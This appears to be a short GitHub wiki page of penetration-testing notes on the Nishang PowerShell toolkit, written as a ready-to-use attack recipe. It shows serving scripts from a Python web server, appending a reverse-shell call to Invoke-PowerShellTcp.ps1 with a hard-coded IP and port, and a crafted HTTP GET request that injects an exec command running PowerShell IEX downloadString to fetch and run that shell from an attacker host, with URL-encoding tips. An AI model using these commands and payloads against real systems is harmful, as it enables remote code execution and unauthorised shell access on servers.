-
Notifications
You must be signed in to change notification settings - Fork 14
nishang_PS
lethanhtung01011980 edited this page Mar 24, 2020
·
11 revisions
- For those servers with Powershell
- Link: https://github.com/samratashok/nishang
- git clone https://github.com/samratashok/nishang
- To open web server for download script:
python -m SimpleHTTPServer 80
Invoke-PowerShellTcp
- cd nishang/Shells
- https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
- Add at the end of
Invoke-PowerShellTcp.ps1
:Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 5678
GET /?search=%00{.exec|C%3a\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe+IEX(New-Object+Net.Webclient).downloadString('http%3a//10.10.14.15/Invoke-PowerShellTcp.ps1').} HTTP/1.1
- URL Encoding
: to %3a
anda space to +